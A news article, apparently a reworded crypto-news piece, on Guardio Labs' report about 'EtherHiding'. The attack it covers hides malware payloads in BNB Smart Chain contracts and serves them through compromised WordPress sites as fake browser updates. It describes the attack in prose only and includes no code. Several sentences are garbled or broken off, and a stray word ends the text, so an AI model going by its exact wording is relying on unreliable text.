Cybercriminals have discovered a new way to deliver malware to unsuspecting users, this time by manipulating the BNB Smart Chain (BSC) smart contract to hide the malware and spread malicious code.
A subdivision of the technology known as “EtherHiding” is shared Security researchers from Guardio Labs explained in an Oct. 15 report that the attack involved compromising a WordPress site by injecting code that retrieved a partial payload from a blockchain contract.
The attackers hid the payload within a Binance smart contract, essentially acting as an anonymous free escrow platform for them.
Guardio Labs has revealed “EtherHiding” – a new threat hidden in Binance Smart Chain, an evasion detection technique that targets infected WordPress sites. Learn about this game-changing method! @BNBC chain #BNBCchain #cybersecurity https://t.co/alNI5KqKUO
— Guardio (@GuardioSecurity) October 15, 2023
Hackers can update the code and change the attack methods at will. The latest attack comes in the form of a fake browser update – prompting victims to update their browser using a fake landing page and link.
The payload contains JavaScript that obtains additional code from the attacker’s domain. This can ultimately lead to entire websites being compromised with fake browser update notifications spreading malware.
This approach allows threat actors to modify the attack chain by simply replacing malicious code with each new blockchain transaction. This makes mitigating attacks challenging, said Nati Tal, head of cybersecurity at Guardio Labs, and security researcher Oleg Zaytsev.
Once infected smart contracts are deployed, they operate autonomously. All Binance can do is rely on its developer community to flag malicious code in contracts when they find it.
Guardio said website owners using WordPress (which runs about 43% of websites) need to be extra vigilant about their security practices before adding:
“WordPress sites are highly vulnerable and frequently compromised because they are the primary gateway through which these threats reach large numbers of victims.”
related: Cisco Talos reveals that cryptocurrency investors are being attacked by new malware
The company concluded that Web3 and blockchain bring new possibilities for uncontrolled malicious activity. “Adaptive defenses are needed to address these emerging threats,” the report said.
Magazine: Blockchain Detective – Mt. Gox Collapse Witnessed the Birth of Chainaanalysis
Svlook
